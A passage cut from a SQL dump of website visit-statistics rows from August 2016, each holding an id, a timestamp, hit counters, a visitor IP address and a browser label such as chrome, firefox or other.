0,0,'91.196.178.67','chrome'),(58670,1472191880,1,1,0,0,'130.193.50.34','other'),(58671,1472191881,1,1,0,0,'130.193.51.19','other'),(58672,1472192081,1,1,0,0,'164.132.161.47','other'),(58673,1472192297,1,1,0,0,'194.44.134.10','chrome'),(58674,1472192430,1,1,0,0,'193.34.94.57','chrome'),(58675,1472192498,1,1,0,0,'91.196.178.72','firefox'),(58676,1472192893,1,1,0,0,'91.196.178.169','chrome'),(58677,1472193052,1,1,0,0,'144.76.12.78','other'),(58678,1472193209,1,1,0,0,'164.132.161.89','other'),(58679,1472193460,1,1,0,0,'51.255.65.90','other'),(58680,1472193821,1,1,0,0,'91.196.178.72','firefox'),(58681,1472193954,1,1,0,0,'141.0.12.132','chrome'),(58682,1472194460,1,1,0,0,'51.255.65.27','other'),(58683,1472194516,1,1,0,0,'180.76.15.31','other'),(58684,1472194559,1,1,0,0,'195.64.190.1','firefox'),(58685,1472194684,1,1,0,0,'130.193.51.19','other'),(58686,1472194769,1,1,0,0,'5.9.123.116','other'),(58687,1472195167,1,1,0,0,'94.178.13.20','chrome'),(58688,1472195400,1,1,0,0,'164.132.161.26','other'),(58689,1472195747,1,1,0,0,'51.255.65.2','other'),(58690,1472195953,1,1,0,0,'51.255.65.76','other'),(58691,1472196139,1,1,0,0,'193.34.94.57','chrome'),(58692,1472196844,1,0,1,0,'66.249.64.24',''),(58693,1472197006,1,0,1,0,'66.249.64.79',''),(58694,1472197808,3,3,0,0,'130.193.50.34','other'),(58695,1472197810,1,1,0,0,'141.8.183.25','other'),(58696,1472198185,1,1,0,0,'185.41.21.80','chrome'),(58697,1472198386,1,1,0,0,'51.255.65.66','other'),(58698,1472198535,1,1,0,0,'180.76.15.16','other'),(58699,1472198549,1,1,0,0,'164.132.161.25','other'),(58700,1472198623,1,0,1,0,'66.249.64.27',''),(58701,1472198785,2,2,0,0,'141.8.183.25','other'),(58702,1472199029,1,1,0,0,'94.179.252.13','chrome'),(58703,1472199834,1,1,0,0,'51.255.65.53','other'),(58704,1472200403,1,1,0,0,'51.255.65.26','other'),(58705,1472200623,1,1,0,0,'66.249.64.21','chrome'),(58706,1472201124,1,1,0,0,'164.132.161.38','other'),(58707,1472201446,1,1,0,0,'51.255.65.70','other'),(58708,1472201480,2,2,0,0,'130.193.50.34','other'),(58709,1472201531,1,0,1,0,'66.249.64.24',''),(58710,1472201719,1,1,0,0,'157.55.39.253','other'),(58711,1472202682,1,1,0,0,'164.132.161.3','other'),(58712,1472202750,1,1,0,0,'51.255.65.43','other'),(58713,1472202929,1,1,0,0,'51.255.65.7','other'),(58714,1472203044,1,1,0,0,'51.255.65.5','other'),(58715,1472203659,1,1,0,0,'94.179.11.39','chrome'),(58716,1472204207,1,1,0,0,'176.241.109.94','other'),(58717,1472204456,1,1,0,0,'91.218.15.226','chrome'),(58718,1472204648,1,1,0,0,'157.55.39.253','other'),(58719,1472204811,1,1,0,0,'51.255.65.47','other'),(58720,1472205143,1,1,0,0,'176.241.109.94','other'),(58721,1472205618,1,1,0,0,'91.196.178.70','chrome'),(58722,1472205723,1,0,1,0,'66.249.64.21',''),(58723,1472205943,1,1,0,0,'66.249.64.69','chrome'),(58724,1472206836,2,2,0,0,'130.193.50.34','other'),(58725,1472208000,1,1,0,0,'94.179.11.39','chrome'),(58726,1472208104,1,1,0,0,'95.134.229.201','chrome'),(58727,1472208114,1,1,0,0,'78.111.187.128','firefox'),(58728,1472208278,1,1,0,0,'164.132.161.25','other'),(58729,1472208647,1,1,0,0,'193.34.94.57','chrome'),(58730,1472208928,1,1,0,0,'130.193.50.34','other'),(58731,1472208929,1,1,0,0,'141.8.142.58','other'),(58732,1472209014,1,1,0,0,'94.179.0.52','chrome'),(58733,1472209478,1,1,0,0,'51.255.65.62','other'),(58734,1472210191,1,1,0,0,'130.193.50.34','other'),(58735,1472210192,1,1,0,0,'141.8.183.25','other'),(58736,1472210596,1,1,0,0,'164.132.161.14','other'),(58737,1472210912,1,0,1,0,'66.249.64.74',''),(58738,1472210959,1,1,0,0,'164.132.161.25','other'),(58739,1472211086,1,1,0,0,'164.132.161.21','other'),(58740,1472211160,1,1,0,0,'51.255.65.65','other'),(58741,1472211227,1,1,0,0,'164.132.161.72','other'),(58742,1472211410,2,2,0,0,'144.76.29.66','other'),(58743,1472212415,1,1,0,0,'51.255.65.40','other'),(58744,1472212419,1,1,0,0,'51.255.65.70','other'),(58745,1472212723,1,1,0,0,'164.132.161.55','other'),(58746,1472214762,4,4,0,0,'141.8.183.25','other'),(58747,1472216263,1,1,0,0,'174.34.135.242','other'),(58748,1472217805,2,2,0,0,'141.8.183.25','other'),(58749,1472218368,1,1,0,0,'130.193.50.34','other'),(58750,1472218452,1,1,0,0,'180.76.15.6','other'),(58751,1472219813,1,1,0,0,'207.46.13.14','other'),(58752,1472219864,1,1,0,0,'93.158.152.51','other'),(58753,1472219865,1,1,0,0,'141.8.142.85','other'),(58754,1472219970,1,0,1,0,'66.249.64.24',''),(58755,1472220616,1,1,0,0,'94.179.5.134','chrome'),(58756,1472220749,1,1,0,0,'91.196.178.103','chrome'),(58757,1472221151,1,1,0,0,'51.255.66.125','other'),(58758,1472221241,1,1,0,0,'66.249.93.57','chrome'),(58759,1472221730,1,1,0,0,'91.196.178.103','chrome'),(58760,1472222058,1,1,0,0,'77.122.101.146','chrome'),(58761,1472222367,1,0,1,0,'66.249.64.27',''),(58762,1472222723,1,1,0,0,'188.32.52.136','chrome'),(58763,1472222725,1,1,0,0,'95.27.141.169','chrome'),(58764,1472222726,1,1,0,0,'46.42.162.108','firefox'),(58765,1472222727,1,1,0,0,'176.193.105.4','opera'),(58766,1472222729,1,1,0,0,'91.79.82.123','firefox'),(58767,1472223401,1,1,0,0,'94.179.101.36','firefox'),(58768,1472224247,4,4,0,0,'91.196.178.67','other'),(58769,1472224847,1,1,0,0,'141.0.13.78','other'),(58770,1472225000,1,0,1,0,'66.249.64.24',''),(58771,1472225424,1,1,0,0,'91.196.178.66','firefox'),(58772,1472225732,1,0,1,0,'66.249.64.69',''),(58773,1472225930,1,0,1,0,'68.180.230.111',''),(58774,1472226536,2,2,0,0,'141.8.142.61','other'),(58775,1472227534,1,0,1,0,'66.249.64.27',''),(58776,1472227727,2,2,0,0,'130.193.50.34','other'),(58777,1472227730,2,2,0,0,'141.8.183.25','other'),(58778,1472227934,1,0,1,0,'66.249.64.21',''),(58779,1472228448,1,0,1,0,'66.249.64.27',''),(58780,1472228698,4,4,0,0,'173.234.159.250','other'),(58781,1472230478,1,1,0,0,'66.249.64.21','chrome'),(58782,1472231175,1,1,0,0,'164.132.161.54','other'),(58783,1472231294,1,1,0,0,'51.255.65.76','other'),(58784,1472231482,1,1,0,0,'157.55.39.253','other'),(58785,1472231696,1,1,0,0,'164.132.161.7','other'),(58786,1472231952,1,1,0,0,'51.255.65.32','other'),(58787,1472232023,1,1,0,0,'164.132.161.72','other'),(58788,1472232487,1,1,0,0,'51.255.65.96','other'),(58789,1472232734,1,1,0,0,'51.255.65.45','other'),(58790,1472232867,1,1,0,0,'157.55.39.120','other'),(58791,1472232978,1,1,0,0,'51.255.65.73','other'),(58792,1472233396,2,2,0,0,'130.193.50.34','other'),(58793,1472233398,2,2,0,0,'130.193.51.19','other'),(58794,1472234218,1,1,0,0,'51.255.65.17','other'),(58795,1472235229,1,1,0,0,'37.54.19.3','firefox'),(58796,1472235419,1,1,0,0,'51.255.65.24','other'),(58797,1472236322,1,1,0,0,'92.112.145.170','chrome'),(58798,1472236336,2,2,0,0,'130.193.51.19','other'),(58799,1472236729,1,1,0,0,'141.8.142.58','other'),(58800,1472236730,2,2,0,0,'141.8.183.25','other'),(58801,1472236980,1,1,0,0,'51.255.65.65','other'),(58802,1472237288,1,1,0,0,'164.132.161.95','other'),(58803,1472237396,1,0,1,0,'66.249.64.21',''),(58804,1472237402,1,0,1,0,'66.249.64.27',''),(58805,1472237475,1,1,0,0,'51.255.65.71','other'),(58806,1472237772,1,1,0,0,'51.255.65.7','other'),(58807,1472237804,1,1,0,0,'164.132.161.56','other'),(58808,1472238163,1,1,0,0,'51.255.65.2','other'),(58809,1472238398,1,0,1,0,'66.249.64.27',''),(58810,1472238531,1,1,0,0,'51.255.65.63','other'),(58811,1472238704,1,1,0,0,'164.132.161.73','other'),(58812,1472239402,1,1,0,0,'185.26.180.181','other'),(58813,1472239947,1,0,1,0,'66.249.64.24',''),(58814,1472239995,1,0,1,0,'66.249.64.79',''),(58815,1472240440,1,1,0,0,'51.255.65.57','other'),(58816,1472241011,2,2,0,0,'130.193.50.34','other'),(58817,1472241164,1,1,0,0,'66.249.64.79','chrome'),(58818,1472241573,1,1,0,0,'95.133.193.35','chrome'),(58819,1472241594,1,1,0,0,'141.8.183.25','other'),(58820,1472241994,1,1,0,0,'164.132.161.15','other'),(58821,1472242539,1,1,0,0,'164.132.161.68','other'),(58822,1472242645,1,1,0,0,'164.132.161.12','other'),(58823,1472242740,1,1,0,0,'164.132.161.36','other'),(58824,1472242904,1,0,1,0,'66.249.64.24',''),(58825,1472243302,1,1,0,0,'164.132.161.94','other'),(58826,1472244296,1,1,0,0,'164.132.161.96','other'),(58827,1472244447,1,1,0,0,'164.132.161.21','other'),(58828,1472244454,1,1,0,0,'194.44.153.140','chrome'),(58829,1472244982,4,4,0,0,'51.255.48.153','other'),(58830,1472245050,1,1,0,0,'51.255.65.7','other'),(58831,1472245101,1,0,1,0,'66.249.64.27',''),(58832,1472245148,1,1,0,0,'164.132.161.97','other'),(58833,1472245485,4,4,0,0,'138.201.127.112','other'),(58834,1472246248,1,1,0,0,'51.255.65.76','other'),(58835,1472246552,1,1,0,0,'130.193.50.34','other'),(58836,1472246553,2,2,0,0,'130.193.51.19','other'),(58837,1472247006,2,2,0,0,'141.8.183.25','other'),(58838,1472247204,1,1,0,0,'164.132.161.3','other'),(58839,1472247424,1,1,0,0,'51.255.65.21','other'),(58840,1472247858,1,1,0,0,'164.132.161.92','other'),(58841,1472247862,1,1,0,0,'130.193.51.19','other'),(58842,1472249017,1,0,1,0,'68.180.230.111',''),(58843,1472249502,1,1,0,0,'164.132.161.93','other'),(58844,1472249974,1,1,0,0,'51.255.65.4','other'),(58845,1472250085,1,1,0,0,'66.249.64.187','chrome'),(58846,1472250094,3,3,0,0,'141.8.142.58','other'),(58847,1472250222,1,0,1,0,'66.249.64.185',''),(58848,1472250237,1,1,0,0,'164.132.161.51','other'),(58849,1472250247,1,1,0,0,'5.255.250.41','other'),(58850,1472250357,1,1,0,0,'141.8.142.85','other'),(58851,1472250361,1,1,0,0,'5.255.253.26','other'),(58852,1472250877,1,1,0,0,'51.255.65.44','other'),(58853,1472251024,1,1,0,0,'38.99.82.191','other'),(58854,1472251204,1,1,0,0,'51.255.65.45','other'),(58855,1472251590,1,1,0,0,'51.255.65.63','other'),(58856,1472251711,1,1,0,0,'164.132.161.82','other'),(58857,1472252057,1,1,0,0,'51.255.65.76','other'),(58858,1472252175,1,1,0,0,'38.99.82.191','other'),(58859,1472252417,1,1,0,0,'164.132.161.65','other'),(58860,1472252426,1,1,0,0,'164.132.161.73','other'),(58861,1472252549,1,1,0,0,'157.55.39.88','other'),(58862,1472252644,1,1,0,0,'141.8.183.25','other'),(58863,1472252645,1,1,0,0,'130.193.50.34','other'),(58864,1472252894,1,0,1,0,'66.249.64.61',''),(58865,1472253607,1,1,0,0,'164.132.161.33','other'),(58866,1472253657,1,1,0,0,'178.93.150.0','chrome'),(58867,1472253924,1,1,0,0,'164.132.161.61','other'),(58868,1472254408,1,1,0,0,'38.99.82.191','other'),(58869,1472254428,2,2,0,0,'130.193.50.34','other'),(58870,1472254429,1,1,0,0,'141.8.142.61','other'),(58871,1472254641,1,1,0,0,'51.255.65.36','other'),(58872,1472254883,1,1,0,0,'164.132.161.9','other'),(58873,1472254935,2,2,0,0,'141.8.183.25','other'),(58874,1472255400,1,1,0,0,'51.255.65.28','other'),(58875,1472255530,1,1,0,0,'164.132.161.65','other'),(58876,1472255654,1,1,0,0,'130.193.51.19','other'),(58877,1472255657,1,1,0,0,'51.255.65.37','other'),(58878,1472255703,1,1,0,0,'38.99.82.191','other'),(58879,1472255706,1,1,0,0,'51.255.65.14','other'),(58880,1472255768,1,1,0,0,'164.132.161.37','other'),(58881,1472256341,1,1,0,0,'164.132.161.67','other'),(58882,1472257117,1,1,0,0,'51.255.65.13','other'),(58883,1472257387,1,1,0,0,'51.255.65.43','other'),(58884,1472257632,2,2,0,0,'141.8.183.25','other'),(58885,1472257772,1,0,1,0,'66.249.76.59',''),(58886,1472257785,1,1,0,0,'130.193.50.34','other'),(58887,1472257787,1,1,0,0,'130.193.51.19','other'),(58888,1472258258,1,1,0,0,'164.132.161.44','other'),(58889,1472258293,1,1,0,0,'164.132.161.96','other'),(58890,1472258426,1,0,1,0,'66.249.76.61',''),(58891,1472258459,1,1,0,0,'51.255.65.32','other'),(58892,1472261227,1,0,1,0,'66.249.66.84',''),(58893,1472261401,1,0,1,0,'66.249.76.60',''),(58894,1472261751,1,1,0,0,'51.255.65.52','other'),(58895,1472261785,1,0,1,0,'66.249.66.81',''),(58896,1472262183,1,1,0,0,'157.55.39.253','other'),(58897,1472262272,1,1,0,0,'51.255.65.10','other'),(58898,1472263271,1,0,1,0,'66.249.76.61',''),(58899,1472264157,1,0,1,0,'66.249.76.59',''),(58900,1472264680,1,1,0,0,'164.132.161.29','other'),(58901,1472265539,2,2,0,0,'38.99.82.191','other'),(58902,1472266854,1,0,1,0,'66.249.76.81',''),(58903,1472266905,3,3,0,0,'38.99.82.191','other'),(58904,1472268527,1,1,0,0,'37.204.154.188','msie'),(58905,1472268567,2,2,0,0,'38.99.82.191','other'),(58906,1472269048,2,2,0,0,'130.193.50.34','other'),(58907,1472269548,1,1,0,0,'51.255.65.24','other'),(58908,1472269565,1,1,0,0,'38.99.82.191','other'),(58909,1472269797,1,1,0,0,'188.32.233.178','msie'),(58910,1472269937,1,0,1,0,'66.249.66.81',''),(58911,1472269939,1,0,1,0,'66.249.76.59',''),(58912,1472270489,1,1,0,0,'51.255.65.74','other'),(58913,1472270764,1,1,0,0,'51.255.65.45','other'),(58914,1472270766,3,3,0,0,'38.99.82.191','other'),(58915,1472270849,1,1,0,0,'51.255.65.55','other'),(58916,1472270945,2,0,2,0,'66.249.76.59',''),(58917,1472271086,1,0,1,0,'66.249.66.87',''),(58918,1472271132,1,1,0,0,'176.14.231.231','msie'),(58919,1472271491,1,0,1,0,'66.249.76.79',''),(58920,1472271500,1,1,0,0,'38.99.82.192','other'),(58921,1472271800,1,1,0,0,'164.132.161.75','other'),(58922,1472272041,1,1,0,0,'164.132.161.9','other'),(58923,1472272505,1,1,0,0,'38.99.82.191','other'),(58924,1472272550,2,2,0,0,'141.8.183.25','other'),(58925,1472272862,2,1,1,0,'66.249.76.60',''),(58926,1472272903,1,1,0,0,'94.179.48.223','chrome'),(58927,1472273036,1,1,0,0,'51.255.65.31','other'),(58928,1472273443,1,1,0,0,'38.99.82.191','other'),(58929,1472273894,1,1,0,0,'51.255.65.7','other'),(58930,1472274363,2,2,0,0,'38.99.82.192','other'),(58931,1472274882,1,1,0,0,'51.255.65.72','other'),(58932,1472275043,2,2,0,0,'38.99.82.191','other'),(58933,1472275617,2,0,2,0,'66.249.76.60',''),(58934,1472275831,1,0,1,0,'66.249.76.61',''),(58935,1472276394,1,1,0,0,'141.8.183.25','other'),(58936,1472276395,1,1,0,0,'141.8.142.58','other'),(58937,1472276483,4,4,0,0,'38.99.82.191','other'),(58938,1472277135,1,1,0,0,'66.249.66.84','chrome'),(58939,1472277533,1,0,1,0,'66.249.76.60',''),(58940,1472277666,3,3,0,0,'38.99.82.191','other'),(58941,1472277712,1,1,0,0,'164.132.161.92','other'),(58942,1472278533,1,1,0,0,'51.255.65.91','other'),(58943,1472278775,1,1,0,0,'51.255.65.59','other'),(58944,1472279139,1,1,0,0,'180.76.15.31','other'),(58945,1472279234,1,1,0,0,'51.255.65.85','other'),(58946,1472280000,1,0,1,0,'66.249.76.59',''),(58947,1472280509,1,1,0,0,'51.255.65.41','other'),(58948,1472280677,1,0,1,0,'66.249.66.87',''),(58949,1472280689,1,1,0,0,'51.255.65.3','other'),(58950,1472280887,1,1,0,0,'180.76.15.139','other'),(58951,1472280935,1,1,0,0,'164.132.161.57','other'),(58952,1472281035,18,18,0,0,'138.201.125.143','other'),(58953,1472281643,1,1,0,0,'157.55.39.253','other'),(58954,1472281757,1,1,0,0,'164.132.161.49','other'),(58955,1472282665,1,0,1,0,'66.249.66.84',''),(58956,1472282736,1,0,1,0,'66.249.76.61',''),(58957,1472282960,1,1,0,0,'144.76.12.75','other'),(58958,1472283822,1,1,0,0,'207.46.13.14','other'),(58959,1472283943,1,0,1,0,'66.249.76.61',''),(58960,1472283964,2,0,2,0,'66.249.66.183',''),(58961,1472284194,1,1,0,0,'51.255.65.21','other'),(58962,1472284199,1,1,0,0,'51.255.65.83','other'),(58963,1472284325,1,1,0,0,'93.158.152.46','other'),(58964,1472284332,1,1,0,0,'130.193.51.81','other'),(58965,1472284393,1,1,0,0,'164.132.161.93','other'),(58966,1472284713,1,0,1,0,'66.249.76.81',''),(58967,1472285236,1,1,0,0,'52.25.108.57','msie'),(58968,1472285573,1,1,0,0,'51.255.65.46','other'),(58969,1472285609,1,1,0,0,'164.132.161.83','other'),(58970,1472285904,1,1,0,0,'51.255.65.89','other'),(58971,1472286097,1,1,0,0,'164.132.161.56','other'),(58972,1472286109,1,1,0,0,'51.255.65.36','other'),(58973,1472287628,1,1,0,0,'164.132.161.87','other'),(58974,1472288261,1,1,0,0,'51.255.65.31','other'),(58975,1472288704,1,1,0,0,'164.132.161.55','other'),(58976,1472289087,1,1,0,0,'51.255.65.44','other'),(58977,1472289107,1,1,0,0,'164.132.161.93','other'),(58978,1472289214,1,1,0,0,'51.255.65.35','other'),(58979,1472289272,1,1,0,0,'51.255.65.23','other'),(58980,1472290188,1,1,0,0,'91.196.178.38','firefox'),(58981,1472290452,2,0,2,0,'68.180.230.111',''),(58982,1472291613,1,1,0,0,'164.132.161.20','other'),(58983,1472292060,1,1,0,0,'164.132.161.78','other'),(58984,1472292125,1,1,0,0,'51.255.65.2','other'),(58985,1472294048,1,1,0,0,'66.249.76.59','chrome'),(58986,1472294484,1,0,1,0,'66.249.76.77',''),(58987,1472295104,1,1,0,0,'66.249.76.77','chrome'),(58989,1472295200,1,1,0,0,'178.137.87.242','firefox'),(58990,1472295354,1,1,0,0,'164.132.161.51','other'),(58991,1472295949,1,1,0,0,'164.132.161.73','other'),(58992,1472296256,1,1,0,0,'37.53.89.22','chrome'),(58993,1472296704,1,1,0,0,'51.255.65.52','other'),(58994,1472296876,1,1,0,0,'122.167.64.142','firefox'),(58995,1472296887,1,1,0,0,'164.132.161.18','other'),(58996,1472296955,1,1,0,0,'164.132.161.88','other'),(58997,1472297144,1,1,0,0,'51.255.65.42','other'),(58998,1472297165,1,0,1,0,'66.249.76.61',''),(58999,1472297198,1,0,1,0,'66.249.76.59',''),(59000,1472297322,1,0,1,0,'66.249.76.81',''),(59001,1472298011,1,1,0,0,'164.132.161.10','other'),(59002,1472298295,1,1,0,0,'157.55.39.36','other'),(59003,1472299229,1,1,0,0,'164.132.161.93','other'),(59004,1472299642,1,1,0,0,'130.193.50.34','other'),(59005,1472300223,1,1,0,0,'217.69.133.217','other'),(59006,1472301911,62,62,0,0,'212.47.231.31','other'),(59007,1472302116,1,1,0,0,'164.132.161.58','other'),(59008,1472302216,1,1,0,0,'164.132.161.63','other'),(59009,1472302835,1,1,0,0,'51.255.65.48','other'),(59010,1472303259,1,1,0,0,'157.55.39.120','other'),(59011,1472304555,1,1,0,0,'164.132.161.85','other'),(59012,1472305934,1,1,0,0,'164.132.161.14','other'),(59013,1472306237,1,1,0,0,'164.132.161.51','other'),(59014,1472306265,1,1,0,0,'51.255.65.34','other'),(59015,1472306536,1,1,0,0,'164.132.161.73','other'),(59016,1472306638,1,1,0,0,'157.55.39.36','other'),(59017,1472306809,1,1,0,0,'51.255.65.61','other'),(59018,1472306986,1,1,0,0,'51.255.65.67','other'),(59019,1472307876,1,1,0,0,'212.55.85.158','chrome'),(59020,1472308247,1,1,0,0,'164.132.161.29','other'),(59021,1472308944,1,1,0,0,'37.54.19.3','firefox'),(59022,1472309407,1,1,0,0,'180.76.15.146','other'),(59023,1472311283,1,1,0,0,'51.255.65.31','other'),(59024,1472312295,1,1,0,0,'164.132.161.78','other'),(59025,1472312791,1,1,0,0,'51.255.65.82','other'),(59026,1472313947,1,1,0,0,'164.132.161.25','other'),(59027,1472314588,1,1,0,0,'164.132.161.15','other'),(59028,1472315139,1,1,0,0,'51.255.65.71','other'),(59029,1472315166,1,1,0,0,'91.196.178.70','firefox'),(59030,1472316125,1,1,0,0,'164.132.161.2','other'),(59031,1472316562,1,1,0,0,'176.104.83.21','chrome'),(59032,1472316572,1,1,0,0,'130.193.50.34','other'),(59033,1472316850,1,1,0,0,'51.255.65.84','other'),(59034,1472317222,1,1,0,0,'51.255.65.51','other'),(59035,1472318061,1,1,0,0,'95.108.225.202','chrome'),(59036,1472318537,1,1,0,0,'180.76.15.25','other'),(59037,1472318784,1,1,0,0,'82.193.98.135','opera'),(59038,1472319506,1,1,0,0,'51.255.65.86','other'),(59039,1472319554,1,1,0,0,'51.255.65.69','other'),(59040,1472319673,1,1,0,0,'213.179.252.62','firefox'),(59041,1472320291,1,1,0,0,'164.132.161.20','other'),(59042,1472321110,1,1,0,0,'130.193.50.34','other'),(59043,1472322642,1,1,0,0,'51.255.65.42','other'),(59044,1472323106,1,1,0,0,'141.0.12.78','other'),(59045,1472323885,1,1,0,0,'164.132.161.43','other'),(59046,1472326619,1,1,0,0,'82.145.221.92','other'),(59047,1472326980,1,1,0,0,'164.132.161.53','other'),(59048,1472327175,1,1,0,0,'164.132.161.11','other'),(59049,1472328126,1,1,0,0,'164.132.161.12','other'),(59050,1472328462,1,1,0,0,'178.255.215.94','other'),(59051,1472330095,1,1,0,0,'51.255.65.15','other'),(59052,1472330195,1,1,0,0,'51.255.65.50','other'),(59053,1472330342,1,1,0,0,'130.193.50.34','other'),(59054,1472330959,1,1,0,0,'164.132.161.13','other'),(59055,1472331044,1,1,0,0,'164.132.161.7','other'),(59056,1472331133,1,0,1,0,'66.249.76.59',''),(59057,1472331256,1,1,0,0,'51.255.65.14','other'),(59058,1472331327,1,1,0,0,'51.255.65.8','other'),(59059,1472331625,1,1,0,0,'164.132.161.81','other'),(59060,1472333614,1,1,0,0,'51.255.65.87','other'),(59061,1472335082,1,1,0,0,'130.193.50.34','other'),(59062,1472336144,1,1,0,0,'51.255.65.88','other'),(59063,1472336556,1,1,0,0,'51.255.65.87','other'),(59064,1472336652,1,1,0,0,'40.77.167.35','other'),(59065,1472338588,1,1,0,0,'51.255.65.50','other'),(59066,1472338947,1,1,0,0,'51.255.65.83','other'),(59067,1472339796,1,1,0,0,'164.132.161.23','other'),(59068,1472341262,1,1,0,0,'164.132.161.54','other'),(59069,1472341268,1,1,0,0,'51.255.65.75','other'),(59070,1472341319,1,1,0,0,'164.132.161.22','other'),(59071,1472342020,1,1,0,0,'51.255.65.63','other'),(59072,1472342031,1,1,0,0,'51.255.65.44','other'),(59073,1472342481,1,1,0,0,'51.255.65.90','other'),(59074,1472342664,1,1,0,0,'51.255.65.45','other'),(59075,1472342893,1,1,0,0,'51.255.65.92','other'),(59076,1472342894,1,1,0,0,'164.132.161.57','other'),(59077,1472343069,1,1,0,0,'207.46.13.61','other'),(59078,1472343239,1,1,0,0,'164.132.161.68','other'),(59079,1472344088,1,1,0,0,'51.255.65.10','other'),(59080,1472345076,1,1,0,0,'141.8.183.25','other'),(59081,1472345588,1,1,0,0,'164.132.161.76','other'),(59082,1472345959,1,0,1,0,'66.249.76.61',''),(59083,1472346350,1,1,0,0,'5.255.250.41','other'),(59084,1472347320,1,1,0,0,'157.55.39.120','other'),(59085,1472347710,1,1,0,0,'164.132.161.5','other'),(59086,1472348818,1,1,0,0,'164.132.161.94','other'),(59087,1472349244,2,2,0,0,'51.255.65.92','other'),(59088,1472350257,1,1,0,0,'164.132.161.28','other'),(59089,1472351600,1,1,0,0,'164.132.161.74','other'),(59090,1472353261,1,1,0,0,'164.132.161.49','other'),(59091,1472353993,1,1,0,0,'164.132.161.73','other'),(59092,1472354284,1,1,0,0,'164.132.161.72','other'),(59093,1472355070,1,1,0,0,'178.140.238.142','msie'),(59094,1472355248,1,1,0,0,'77.37.221.35','msie'),(59095,1472355570,1,1,0,0,'51.255.65.65','other'),(59096,1472356207,1,1,0,0,'51.255.65.5','other'),(59097,1472357580,1,1,0,0,'130.193.50.34','other'),(59098,1472358384,1,1,0,0,'95.221.222.104','msie'),(59099,1472361754,1,1,0,0,'66.249.76.58','chrome'),(59100,1472361918,1,1,0,0,'40.77.167.35','other'),(59101,1472362741,1,1,0,0,'141.8.183.25','other'),(59102,1472362763,3,3,0,0,'130.193.50.34','other'),(59103,1472363530,1,1,0,0,'51.255.65.4','other'),(59104,1472364449,1,1,0,0,'5.255.250.41','other'),(59105,1472364557,1,1,0,0,'212.55.85.158','chrome'),(59106,1472364618,1,1,0,0,'164.132.161.93','other'),(59107,1472364814,1,1,0,0,'141.8.142.58','other'),(59108,1472365262,2,2,0,0,'130.193.50.34','other'),(59109,1472365523,2,2,0,0,'141.8.183.25','other'),(59110,1472365861,1,1,0,0,'164.132.161.37','other'),(59111,1472365968,1,1,0,0,'176.14.218.158','other'),(59112,1472366871,1,1,0,0,'51.255.65.47','other'),(59113,1472367732,1,1,0,0,'195.20.154.115','chrome'),(59114,1472369942,1,1,0,0,'51.255.65.81','other'),(59115,1472371652,1,1,0,0,'51.255.65.51','other'),(59116,1472371718,1,1,0,0,'91.121.181.101','other'),(59117,1472372291,1,1,0,0,'141.8.183.25','other'),(59118,1472372822,1,1,0,0,'164.132.161.71','other'),(59119,1472373009,1,1,0,0,'66.249.93.51','chrome'),(59120,1472373024,1,1,0,0,'164.132.161.41','other'),(59121,1472373126,1,1,0,0,'51.255.65.11','other'),(59122,1472373191,1,1,0,0,'164.132.161.23','other'),(59123,1472374113,1,1,0,0,'51.255.65.96','other'),(59124,1472375847,1,1,0,0,'178.94.231.203','firefox'),(59125,1472376163,1,1,0,0,'37.115.142.42','chrome'),(59126,1472376170,2,2,0,0,'78.46.50.246','other'),(59127,1472376418,1,1,0,0,'51.255.65.60','other'),(59128,1472376977,1,1,0,0,'164.132.161.51','other'),(59129,1472377501,1,1,0,0,'164.132.161.50','other'),(59130,1472378089,1,1,0,0,'164.132.161.96','other'),(59131,1472378434,1,1,0,0,'164.132.161.12','other'),(59132,1472379560,1,1,0,0,'51.255.65.9','other'),(59133,1472380784,1,1,0,0,'5.9.89.170','other'),(59134,1472381035,1,1,0,0,'164.132.161.71','other'),(59135,1472381126,1,1,0,0,'94.179.209.150','chrome'),(59136,1472381618,1,1,0,0,'164.132.161.3','other'),(59137,1472382285,1,1,0,0,'164.132.161.56','other'),(59138,1472382565,1,0,1,0,'68.180.230.222',''),(59139,1472382834,1,1,0,0,'164.132.161.6','other'),(59140,1472383386,3,3,0,0,'130.193.50.34','other'),(59141,1472383660,5,5,0,0,'141.8.183.25','other'),(59142,1472383744,1,1,0,0,'164.132.161.3','other'),(59143,1472384547,1,1,0,0,'212.55.85.158','chrome'),(59144,1472384990,1,1,0,0,'178.92.8.230','chrome'),(59145,1472385013,1,1,0,0,'130.193.50.34','other'),(59146,1472385500,1,1,0,0,'51.255.65.12','other'),(59147,1472385869,2,0,2,0,'66.249.76.59',''),(59148,1472386467,1,1,0,0,'91.196.178.36','other'),(59149,1472386567,1,1,0,0,'164.132.161.4','other'),(59150,1472386773,4,4,0,0,'141.95.0.58','other'),(59151,1472388613,1,1,0,0,'164.132.161.50','other'),(59152,1472388830,4,4,0,0,'195.154.187.115','other'),(59153,1472388862,1,1,0,0,'51.255.65.14','other'),(59154,1472388952,1,1,0,0,'51.255.65.76','other'),(59155,1472389785,2,2,0,0,'80.91.162.98','other'),(59156,1472390044,1,1,0,0,'157.55.39.225','other'),(59157,1472390183,1,1,0,0,'164.132.161.60','other'),(59158,1472390211,1,0,1,0,'66.249.76.61',''),(59159,1472390883,1,1,0,0,'164.132.161.75','other'),(59160,1472391188,1,1,0,0,'51.255.65.94','other'),(59161,1472391539,101,101,0,0,'209.190.113.85','other'),(59162,1472391676,1,1,0,0,'64.79.76.50','other'),(59163,1472391881,1,1,0,0,'51.255.65.22','other'),(59164,1472392107,1,1,0,0,'164.132.161.89','other'),(59165,1472392872,1,1,0,0,'51.255.65.79','other'),(59166,1472393575,1,1,0,0,'157.55.39.227','other'),(59167,1472393723,2,0,2,0,'68.180.230.178',''),(59168,1472393807,1,1,0,0,'164.132.161.8','other'),(59169,1472394311,3,3,0,0,'130.193.50.34','other'),(59170,1472394899,1,1,0,0,'51.255.65.48','other'),(59171,1472396698,3,3,0,0,'141.95.0.58','other'),(59172,1472396715,1,1,0,0,'51.255.65.84','other'),(59173,1472396739,1,1,0,0,'164.132.161.34','other'),(59174,1472396857,1,1,0,0,'130.193.50.34','other'),(59175,1472397846,1,1,0,0,'95.163.177.142','chrome'),(59176,1472397897,1,1,0,0,'164.132.161.44','other'),(59177,1472398304,1,1,0,0,'164.132.161.64','other'),(59178,1472398417,1,1,0,0,'51.255.65.21','other'),(59179,1472398480,1,1,0,0,'51.255.65.59','other'),(59180,1472399005,1,1,0,0,'66.249.76.61','chrome'),(59181,1472399046,1,1,0,0,'66.249.76.81','chrome'),(59182,1472400133,1,1,0,0,'164.132.161.44','other'),(59183,1472400568,2,0,2,0,'68.180.230.178',''),(59184,1472400691,1,1,0,0,'157.55.39.